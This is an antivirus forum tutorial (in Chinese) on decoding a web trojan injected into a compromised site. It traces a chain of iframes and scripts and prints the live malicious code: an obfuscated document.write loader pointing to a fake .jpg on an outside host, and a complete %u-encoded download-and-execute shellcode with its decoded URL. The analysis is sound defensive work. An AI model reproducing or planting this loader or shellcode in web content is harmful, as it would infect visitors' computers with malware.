瑞星卡卡安全论坛技术交流区恶意网站交流 解密中容易忽略网马类型(二)

12   1  /  2  页   跳转

[教程] 解密中容易忽略网马类型(二)

解密中容易忽略网马类型(二)

今天我们再来讲一个在初次学习网马解密过程中,新手容易忽略网马类型。这个实例也是在瑞星每日安全播报中一个被挂马网站(http://3g.woku.com),觉得这个例子很典型,今天就来针对这个实例,来给大家讲解一下。

  我们知道一般网页挂马无外乎,在网站首页源代码的头部、中间、尾部,还有一些隐蔽的直接给你挂到二级页面等等,今天我们讲解的这个实例,所挂恶意网址链接在首页的尾部,对于刚学习网页挂马新手,往往有可能会忽略。



用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
分享到:
gototop
 

回复: 解密中容易忽略网马类型(二)

上图为我们使用freshow的check获取网站源代码后,通过filter过滤出的3个script,按照常规解密方法,我们会依次查看这三个script,但是我们发现这三个script并未见有异常。那么我们会认为这个网站是正常?通常我们在网马解密过程中,在获取网站源代码后,最好首先要做的就是仔细查看一下网站源代码,从顶部、中间、尾部等三方面来依次查看,因为我们知道工具不是万能的,它也有可能会忽略掉一些关键链接,而往往被忽略的链接,恰恰是我们最需要检查的链接地址。以上也是一些网马解密中的小经验吧,共享给大家。

  结合我们今天讲解的实例,在通过检查三个script未见异常,那么我们来看一下获取到网站源代码,在源代码的尾部有两处异常,详见下列截图:


gototop
 

回复: 解密中容易忽略网马类型(二)

接下来我们来一下上图红色线标出的代码,简单分析一下。

document.write(unescape("%3Cscript%20src%3Dhttp%3A//ww2.niupan.com/html/youxi/html/youxi/dianzijingji/ads.jpg%3E%3C/script%3E"));


unescape后面的代码看起来很乱,我们将这段代码复制粘贴至freshow的上操作区,通过esc的decode处理一下这段代码。

document.write(unescape("<script src=http://ww2.niupan.com/html/youxi/html/youxi/dianzijingji/ads.jpg></script>"));


经过处理的代码阅读起来简单明了,简单分析一下这也是个script,链接到一个ads.jpg,那么我们来看一下这个jpg是否有问题呢?



gototop
 

回复: 解密中容易忽略网马类型(二)

为了能更好的区分父级和子级的链接对应关系,我们最好将获取到得ad.jpg链接,粘贴至obj区,将它插入到最初我们分析网站链接地址下面,这样就很清楚了,ad.jpg链接是在网站源代码中,具体见上述截图。

  接下来我们通过check获取ad.jpg源代码,再通过filter我们过滤出一个iframe。



gototop
 

回复: 解密中容易忽略网马类型(二)

我们再来看一下adss.htm这个ifame源代码内容,详见下面截图:




  链接到一个b11.htm的iframe
gototop
 

回复: 解密中容易忽略网马类型(二)

再来看一下b11.htm源代码内容,注:别忘用filter将b11.htm过滤到数据收集区,详见下列截图:




有个new.htm的frame,下图后new.htm源代码内容:

gototop
 

回复: 解密中容易忽略网马类型(二)

接下来将new.htm的源文件内容过滤一下,详见下列截图:


   


过滤出三个script和4个iframe,我们来看其中一个zhin.js是否有马
最后编辑networkedition 最后编辑于 2009-06-09 10:41:10
gototop
 

回复: 解密中容易忽略网马类型(二)

从zhin.js中我们过滤出lz.htm,再从lz.htm中我们又过滤出lz.js,接下来看一下lz.js源代码,详见下列截图:

   


var sdzl=window["unescape"](""+"%u54EB"+"%u758B"+"%u8B3C"+"%u3574"+"%u0378"+"%u56F5"+"%u768B"+"%u0320"+"%u33F5"+"%u49C9"+"%uAD41"+"%uDB33"+"%u0F36"+"%u14BE"+"%u3828"+"%u74F2"+"%uC108"+"%u0DCB"+"%uDA03"+"%uEB40"+"%u3BEF"+"%u75DF"+"%u5EE7"+"%u5E8B"+"%u0324"+"%u66DD"+"%u0C8B"+"%u8B4B"+"%u1C5E"+"%uDD03"+"%u048B"+"%u038B"+"%uC3C5"+"%u7275"+"%u6D6C"+"%u6E6F"+"%u642E"+"%u6C6C"+"%u4300"+"%u5C3A"+"%u2e55"+"%u7865"+"%u0065%uC033"+"%u0364"+"%u3040"+"%u0C78"+"%u408"+"B"+"%u8B0"+"C"+"%u"+"1C7"+"0%u8BA"+"D"+"%u084"+"0"+"%u09E"+"B%u408"+"B"+"%u8D3"+"4%"+"u7C4"+"0"+"%u408"+"B"+"%u953C"+"%u8EBF"+"%u0E4E"+"%uE8EC"+"%uFF84%uFFFF"+"%uEC83"+"%u8304"+"%u242C"+"%uFF3C"+"%u95D0"+"%uBF50"+"%u1A36"+"%u702F"+"%u6FE8"+"%uFFFF"+"%u8BFF"+"%u2454"+"%u8DFC"+"%uBA52"+"%uDB33"+"%u5353"+"%uEB52"+"%u5324"+"%uD0FF"+"%uBF5D"+"%uFE98"+"%u0E8A"+"%u53E8"+"%uFFFF"+"%u83FF"+"%u04EC"+"%u2C83"+"%u6224"+"%uD0FF"+"%u7EBF"+"%uE2D8"+"%uE873"+"%uFF40"+"%uFFFF"+"%uFF52"+"%uE8D0"+"%uFFD7"+"%uFFFF"+"%u74"+"6"+"8%u7074%u2f3a%u632f%u6a30%u2e6d%u6f63%u3a6d%u3333%u2f33%u656e%u7777%u6c2f%u7a7a%u632e%u7373%u0000");


本帖被评分 1 次
gototop
 

回复: 解密中容易忽略网马类型(二)

来简单分析一下lz.js,实际上是个shellcode,有很多"+"来连接,可理解为字符串的拼接。可以通过freshow的replace功能去除不需要的代码。小技巧我们直接处理下面代码即可:


"%u74"+"6"+"8%u7074%u2f3a%u632f%u6a30%u2e6d%u6f63%u3a6d%u3333%u2f33%u656e%u7777%u6c2f%u7a7a%u632e%u7373%u0000


处理好的代码如下:


%u7468%u7074%u2f3a%u632f%u6a30%u2e6d%u6f63%u3a6d%u3333%u2f33%u656e%u7777%u6c2f%u7a7a%u632e%u7373%u0000


两次esc后解出网马地址,详见下列截图:

gototop
 

回复: 解密中容易忽略网马类型(二)

好了,后面的几个链接地址就留给大家去解密吧,在这里就不一一进行讲解了。我们来总结一下,通过对上述被挂马网站的分析,我们看到在实际网马解密中,对于在获取到网站源代码后,一定要养成一个良好的习惯,就是先简单查看一下源文件内容这包括顶部、中间、尾部,这些也通常是被网页挂马所利用到得地方。不要过分的依赖解密工具,工具并不是万能的。通过本次讲解,也是想跟大家分享一下这方面的解密经验,希望对大家在网马解密中有所帮助。
最后编辑networkedition 最后编辑于 2009-06-09 11:09:07
gototop
 
12   1  /  2  页   跳转
页面顶部
Powered by Discuz!NT